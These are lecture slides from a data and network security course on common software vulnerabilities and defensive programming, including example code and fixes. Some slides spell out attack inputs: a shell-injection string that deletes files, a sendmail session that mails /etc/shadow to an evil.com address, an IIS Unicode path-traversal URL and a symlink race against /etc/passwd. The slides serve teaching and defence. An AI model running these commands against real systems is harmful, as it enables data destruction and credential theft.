SENG 5199-3
Data and Network Security
Lecture 5
Software Security (I)
Max Schuchard
       News This Week (1)

• Boffins devise 'cyberweapon'

• Microsoft’s Net Security Plan
      COMMON SECURITY BUGS

The most common cause of security bugs
is misplaced trust: programmers assume
that inputs, systems, or people are trustworthy.

An adversary will look for these assumptions
and find ways to invalidate them.


Today, a few examples. For more see
Anderson; 19 Deadly Sins; Wheeler; …
       WEAK INPUT CHECKING
Adversaries can often control program inputs:
  – Direct input: command line, keyboard, …
  – Function calls
  – Config files
  – Network packets
  – Web forms…
Bug: it is common to assume input is “benign”

Example: null-byte certificate.
            EXAMPLE: system()
Web forms are often processed by scripts that
need to run other programs on the server.
Usually scripts use C’s system() or popen().
 Bug: these calls invoke a shell. Command
 separators like “|” and “;” allow the user to
 run other commands on the server.
Form.cgi:
  # … start html …
  system("grep $test file");
  # … do other stuff …

Attacker inputs:   "; rm -rf *"

Web server runs:   "grep ; rm -rf * file"
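Not part of the original slides: a minimal sketch of running grep without going through a shell, so ";" and "|" in the input stay ordinary characters. The function name grep_file and the error handling are illustrative assumptions.

#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

int grep_file(const char *pattern, const char *file) {
    pid_t pid = fork();
    if (pid < 0)
        return -1;                              /* fork failed */
    if (pid == 0) {
        /* child: exec grep directly; no /bin/sh ever sees the input */
        execlp("grep", "grep", "--", pattern, file, (char *)NULL);
        _exit(127);                             /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}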
         BUFFER OVERFLOW
Programmers often assume that inputs will
have a certain length.


When this is false, other program variables
or system data structures can be overwritten.


Exacerbated by the C standard library:
null-terminated strings, off-by-one errors, etc.
                     EXAMPLE
      void check_input(char *input) {
        char buf[8];
        strcpy(buf,input);
        if (check(buf)) allow_action();
        return;
      }
check_input stack frame:

   +---------------+
   |  Ret. Addr.   |  address to jump to at return (4B)
   +---------------+
   |  char *input  |  input pointer (4B)
   +---------------+
   |  buf[7]       |
   |  buf[6]       |
   |   …           |  local variables (8B)
   |  buf[1]       |
   |  buf[0]       |
   +---------------+

          Bug: what if strlen(input) > 7 ?
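Not on the slide: a hedged fix that rejects over-long input before copying. check() and allow_action() are the helpers already assumed by the slide's code.

#include <string.h>

void check_input_fixed(const char *input) {
    char buf[8];
    /* refuse anything that cannot fit together with the NUL terminator */
    if (input == NULL || strlen(input) >= sizeof(buf))
        return;                    /* fail-stop instead of overflowing */
    strcpy(buf, input);            /* now known to fit */
    if (check(buf)) allow_action();
}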
          INTEGER OVERFLOW
Machine integers are not real integers.

  void caller() {
        unsigned int a = read_int_from_network();
        char *z = read_string_from_network();
        if (a > 0) callee(a,z);
  }
  void callee(int a, char* z) {
        char buffer[10]; // … do some other stuff…
        for(int i = 0; i + a < 10 && z[i]; i++)
                buffer[a+i] = z[i];
        return;
  }

            Bug: what if a = 2^32 - 10?
Example: iPhone SMS exploit…
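Not on the slide: one hedged repair of callee, keeping the offset in an unsigned type all the way through and bounding it against the buffer size before any write.

#include <stddef.h>

void callee_fixed(unsigned int a, const char *z) {
    char buffer[10];
    if (a >= sizeof(buffer))               /* no room left at this offset */
        return;
    for (size_t i = 0; a + i < sizeof(buffer) && z[i]; i++)
        buffer[a + i] = z[i];
    /* … use buffer … */
}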
           RACE CONDITIONS
A race condition occurs when there is a nonzero
time interval between checking that some property
holds and relying on it still holding.

Example: Viega & McGraw elevator story.


Race conditions are often called Time of Check /
Time of Use (TOCTOU) vulnerabilities.
                  EXAMPLES
• File permission checks:
  int safe_open_file(char *path) {
    int fd = -1;
    struct stat s;
    stat(path, &s);
    if (!S_ISREG(s.st_mode))
     error("only regular files allowed");
    else fd = open(path, O_RDONLY);
    return fd;
  }
• path can point to a different file after stat!
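Not from the slides: a common mitigation is to open first and then inspect the already-open descriptor with fstat(), so the check and the use refer to the same file object.

#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>

int safe_open_file_fixed(const char *path) {
    int fd = open(path, O_RDONLY | O_NOFOLLOW);   /* open first, refuse symlinks */
    if (fd < 0)
        return -1;
    struct stat s;
    if (fstat(fd, &s) < 0 || !S_ISREG(s.st_mode)) {
        close(fd);                                /* check the open fd, not the name */
        return -1;
    }
    return fd;
}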
                 EXAMPLE
• Ghostscript creates a lot of temporary files:

     name = mktemp("/tmp/gs_XXXXXXXX");
     fp = fopen(name,"w");

• Attacker creates symlink
      /tmp/gs_12345A -> /etc/passwd
  between the calls to mktemp and fopen, when root
  is running gs (just has to happen once!)

• Ghostscript (as root) overwrites /etc/passwd.
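Not from the slides: the usual fix is mkstemp(), which creates and opens the temporary file atomically (O_CREAT|O_EXCL underneath), leaving no window to plant a symlink. The wrapper name open_gs_tempfile is made up for illustration.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

FILE *open_gs_tempfile(void) {
    char name[] = "/tmp/gs_XXXXXX";       /* mkstemp needs six trailing X's */
    int fd = mkstemp(name);               /* create + open in one atomic step */
    if (fd < 0)
        return NULL;
    FILE *fp = fdopen(fd, "w");           /* wrap the fd; no second path lookup */
    if (fp == NULL)
        close(fd);
    return fp;
}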
       NEW ENVIRONMENTS
A good way to violate program assumptions is
to run the program in an environment where
they are false!
• Berkeley rhosts vulnerabilities
  – /etc/hosts.equiv – list of hosts to accept
    rsh connections from
  – Assume a closed network
  – Frequently: “+\n” - superuser can rlogin
    without password from other hosts on LAN
  – LAN gets connected to internet…
                  EXAMPLE
• Cell phones have two requirements:
  – Calls should be placed and billed correctly
  – Voice data should be delivered quickly
• Designed with two channels
  – Control channel, slow and very reliable
  – Data channel, high bandwidth & lossy
• “Text messages” (SMS): don’t tolerate loss.
  – So use the Control Channel!
• Txt2web interfaces: send from a computer!
• DoS: sending 165 SMS messages/second
  can wipe out Manhattan’s cellular network.
       FEEPING CREATURISM

• Many times the addition of more features
  results in more opportunities for bugs.
• Example: MS Office
  – “Macro Language” is VB with complete access to
    machine
  – User loads “I love you.doc” and macro runs, sets up
    back door.
• Old attack on some Unix PDF readers:
  – Victim clicks on a hyperlink in malicious PDF file
  – Reader calls system(“$BROWSER $hyperlink”)
  – Hyperlink ends with “; evil_command_line”
• New PDF attacks
              LOGGING BUGS

Many systems keep a transaction log for error
recovery, debugging, etc.

Typical bugs: assuming logs will be treated as
sensitive, or assuming the logged data is not sensitive.

Example: “security” log of failed login attempts.

PDG web transaction processing system:
• World-readable log file: cgi_bin/PDG_cart/order.log
• Contains mailing addresses, CC numbers, ...
• Google indexed sites with this file
    CONFIGURATION BUGS
Access control in most systems depends on
configuration. Many systems have weak
default (fail open) configurations.
       Default admin passwords
       Services on by default
     Security checks off by default
Sometimes it is hard to change!
Example: Windows NT/IIS
   – FrontPage server is turned on by default.
   – Password is admin password (default: admin)
   – Allows uploads, admin tasks, etc.
   UNNECESSARY PRIVILEGE

Most attacks are about gaining privileges:
access to additional programs, files, etc., on
a system.

Since an attacker who compromises a program gains
that program's privileges, a program should hold as
few privileges as possible.

This is called the Principle of Least Privilege.
                 EXAMPLES
• DOS/Windows: default to all privileges
• Unix: Problems with programs running as
  root
  – Unix requires many programs to run as root
  – Prime examples: sendmail, bind

• Many sendmail attacks, patches; eg
  telnet victim.com 25
  helo any.dns.name
  mail from: “| /bin/mail me@evil.com
    </etc/shadow”
  rcpt to: somebody@somewhere
  data ...
     (NON)-UNIQUE NAMES

Many security mechanisms rely on objects
having unique names.
• Blacklists: NetNanny, firewalls, IIS example…
  Bugs: aliases, symlinks, name resolution…

• SunOS 4.1.x “loadmodule”:
  – calls system(“/bin/ld.so”);
  – Problem: IFS environment variable
• Unqualified domain names:
  mydomain.us vs mydomain.us.net
                  EXAMPLE
IIS has the security goal that only commands
in the subdirectory /scripts should be executed.

So it checks that the URL matches /scripts/*.*

http://a.b.c.d/scripts/../../winnt/system32/cmd.exe?X

 IIS tries to fix this by filtering out URLs with
 “../” in them, before unicode expansion.
http://a.b.c.d/scripts/..%c0%af..%c0%afwinnt/
   system32/cmd.exe?X


                       www.sans.org/rr/threats/unicode.php
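Not from the slides: the robust pattern is to decode and canonicalize the path first, then compare the result against the allowed prefix. A rough POSIX sketch of that idea (IIS itself obviously works differently); is_under_scripts is a hypothetical helper.

#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Return 1 if url_path (already %-decoded) resolves to a file under script_root. */
int is_under_scripts(const char *script_root, const char *url_path) {
    char full[PATH_MAX], resolved[PATH_MAX];
    if (snprintf(full, sizeof(full), "%s/%s", script_root, url_path)
            >= (int)sizeof(full))
        return 0;
    if (realpath(full, resolved) == NULL)        /* canonicalize: folds "..", symlinks */
        return 0;
    size_t n = strlen(script_root);
    return strncmp(resolved, script_root, n) == 0
        && (resolved[n] == '/' || resolved[n] == '\0');
}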
          LAYERED TRUST
• Security failures at one “layer” in a
  system can invalidate assumptions made at
  higher layers.
• Examples:
  – Rhosts: assumes correct DNS/IP mappings.
    Various attacks invalidate this assumption.
  – AS/400: access control not enforced for
    assembly language programs by default
  – Java type errors: javac won’t overwrite
    array types; class files can.
  – Boot sequence: boot Linux from CD, mount
    hard disk, circumvent access controls…
       News This Week (2)

• Android Trojan

• Cold Boot Attacks (Storage)
DEFENSIVE PROGRAMMING

Best practices:
• Language/library and process
• Modularity
• Error conditions
• Input whitelisting
• Loop specification
• Integer ranges
 LANGUAGE/LIBRARY, PROCESS
• Design for security; design & code reviews
• Language and library make a difference
  – Type-safe languages vs C/ASM/Scripting
  – Safer string-handling, I/O libraries for C exist.
• Test cases that can help:
  – Long inputs, unprintable characters, extreme
    values
  – Format specifiers, newlines, NULs…
  – Malformed inputs: aliased or overlapping
    pointers, cyclic structures
• Regression testing
• Bug/Fault evaluation
         EXAMPLES
char charAt(char *str, int index) {
    return str[index];            /* assumes str != NULL and index is in range */
}

char *double_str(char *str) {     /* "double" is a C keyword, so the helper is renamed */
    size_t len = strlen(str);     /* assumes str != NULL */
    char *p = malloc(2*len+1);    /* assumes malloc succeeds */
    strcpy(p, str);
    strcpy(p+len, str);
    return p;
}
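Not from the slides: a hedged sketch of the same helpers with their hidden assumptions checked explicitly rather than left to the caller.

#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Returns '\0' for NULL or out-of-range access instead of reading arbitrary memory. */
char charAt_checked(const char *str, size_t index) {
    if (str == NULL || index >= strlen(str))
        return '\0';
    return str[index];
}

/* Returns NULL on NULL input, size overflow, or allocation failure. */
char *double_str_checked(const char *str) {
    if (str == NULL)
        return NULL;
    size_t len = strlen(str);
    if (len > (SIZE_MAX - 1) / 2)          /* 2*len + 1 would overflow */
        return NULL;
    char *p = malloc(2*len + 1);
    if (p == NULL)
        return NULL;
    memcpy(p, str, len);
    memcpy(p + len, str, len + 1);         /* second copy includes the NUL */
    return p;
}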
         MODULAR DESIGN
• System should be broken down into
  modules:
  – Clear functionality: less chance of mental
    errors by caller
  – Clean interfaces: decrease possible
    interactions
• Least Privilege at the module level
  – E.g. inetd wrapper
  – E.g. web server
• Isolate modules: use language tools,
  system processes…, etc.
       ERROR CONDITIONS

• In languages without exceptions:
  – Check “error conditions” on return values
  – E.g. malloc(), open(), etc. (sketch after this list)
• Catch exceptions or declare them
• Think about where to handle errors
  – Fix locally
  – Propagate to caller
  – Fail-stop
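Not from the slides: a small sketch of the "check return values" habit, with one error propagated to the caller and one handled by failing stop. The function load_config and its contract are illustrative assumptions.

#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>

/* Returns an open fd and sets *out to a buffer of `size` bytes, or -1 on failure. */
int load_config(const char *path, char **out, size_t size) {
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;                 /* propagate: let the caller decide what to do */
    char *buf = malloc(size);
    if (buf == NULL) {             /* fail-stop rather than dereference NULL later */
        close(fd);
        return -1;
    }
    /* … read(fd, buf, size), parse, etc. … */
    *out = buf;
    return fd;
}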
        INPUT VALIDATION

• Before using an input value check
  that it is safe:
  – NULL, Out of range, invalid format,
    too long, too short, etc…
• Err on the side of caution:
  – I know this will be safe vs
  – I can’t think of a way to break this…
• E.g. whitelist safe inputs, rather
  than blacklist dangerous ones.
           EXAMPLE
char *username = getenv("USER");   /* untrusted: attacker controls the environment */
char *buf = malloc(strlen(username)+6);
sprintf(buf, "mail %s", username);
FILE *f = popen(buf, "w");         /* we write to the pipe, and popen runs a shell */
fprintf(f, "Hi.\n");
pclose(f);                         /* popen streams are closed with pclose */

char *validate_username(char *u) {
  char *p;
  if (!u || *u < 'a' || *u > 'z')
    die();
  for (p=u+1; *p; p++)
    if ((*p < '0' || *p > '9')
        && (*p < 'a' || *p > 'z'))
        die();
  return u;
}
    LOOPS & MEMORY LEAKS
• Check preconditions for a loop
• Sanity check return values of functions
• Prefer (safe) exit with error condition to
  “muddle through”
• Avoid algorithmic denial-of-service
  – E.g. hash table with O(n) worst-case lookups
• Safe exit:
  – Free allocated heap objects
  – Maintain consistent state
  – Use error conditions
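Not from the slides: one common C idiom for the "safe exit" bullets, a single cleanup path that frees what was allocated and returns an error condition. write_report is a made-up example function.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int write_report(const char *path, const char *msg) {
    int rc = -1;                       /* error condition returned on any failure */
    char *copy = NULL;
    FILE *fp = NULL;
    copy = malloc(strlen(msg) + 1);
    if (copy == NULL) goto cleanup;
    strcpy(copy, msg);
    fp = fopen(path, "w");
    if (fp == NULL) goto cleanup;
    if (fputs(copy, fp) == EOF) goto cleanup;
    rc = 0;                            /* success */
cleanup:                               /* single exit: no leaks, consistent state */
    if (fp) fclose(fp);
    free(copy);                        /* free(NULL) is a no-op */
    return rc;
}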
        INTEGER OVERFLOWS
• Mismatch with programmer “mental model”
• Check for them!
  – Check inputs in proper range
  – Check (a+b) for overflow (sketch below)
  – Watch out for implicit casting, sign extension…
• Test corner cases: -1, 0, 1, 2^31 - 1, -2^31, …
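Not from the slides: a hedged sketch of the "check (a+b) for overflow" bullet for 32-bit values.

#include <stdint.h>

/* Unsigned addition wraps, so check against the remaining headroom first. */
int add_u32_checked(uint32_t a, uint32_t b, uint32_t *sum) {
    if (a > UINT32_MAX - b)
        return -1;                 /* would wrap around */
    *sum = a + b;
    return 0;
}

/* Signed overflow is undefined behaviour, so rule it out before adding. */
int add_i32_checked(int32_t a, int32_t b, int32_t *sum) {
    if ((b > 0 && a > INT32_MAX - b) || (b < 0 && a < INT32_MIN - b))
        return -1;
    *sum = a + b;
    return 0;
}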
      SALTZER & SCHROEDER
Don’t forget your CODe MAP:

             Complete mediation
             Open design
        safe Defaults

           Mechanism
psychological Acceptability
            Privileges

           http://www.emergentchaos.com/starwars.html
    COMPLETE MEDIATION
• Check every access to every object
• Example:
  – Race conditions
  – Caching may fail: unexpected state change
            OPEN DESIGN

• Security of a system should not
  depend on secrecy of design
• Examples:
  – NT Password file in registry: Format
    reverse-engineered
  – “Backdoors” hidden in code: find with
    debuggers
• Open Design can improve “security.”
• Not a guarantee: GPG, Xwindows…
         FAIL-SAFE DEFAULT

• System failures should default to
  secure state
• Examples:
  – Allow vs Deny permissions
  – Firewall: ports default to closed
• Users will tell you if the application fails
• Attackers won't tell you if security fails
               MECHANISM

• Economy of Mechanism
  – Each edge is a bug opportunity. Minimize edges.
• Least Common Mechanism
  – Minimize complexity of high-degree components.
PSYCHOLOGICAL ACCEPTABILITY
 • If users don’t “buy in” to security
   mechanism, system is insecure
   – Passwords
   – Firewalls
 • If users don’t understand how to
   use security mechanism, system is
   insecure
   – PGP: “Why Johnny Can’t Encrypt…”
              PRIVILEGES

• Least Privilege:
  – Process should have only the privileges
    needed for function
  – Minimize impact of breach
  – Not supported in UNIX, not used in NT…
• Separation of privilege
  – Multiple checks for access: Keycard +
    voiceprint
  – Multiple principals: launch codes, bank
    vaults…
          WORK FACTOR

• Cost of attack should exceed
  resources attacker will spend
• Crypto work factors are “easy”
• Work factor to exploit web server?
 – Finding vulnerabilities: cheap
 – Increase cost of exploitation
 – Convert to physical security
 COMPROMISE RECORDING

• If it is too expensive to prevent
  a compromise, record it.
• Examples:
  – Tamper evident vs. Tamperproof
  – Log files, network IDS
• Problems:
  – Root kit, etc…
        DEFENSE IN DEPTH

• Multiple, orthogonal defenses decrease
  probability of security failures.
• Orthogonal is the key word.
• Examples:
  – “Belt and suspenders”
  – Firewall gateway and software firewall
  – Castle design

				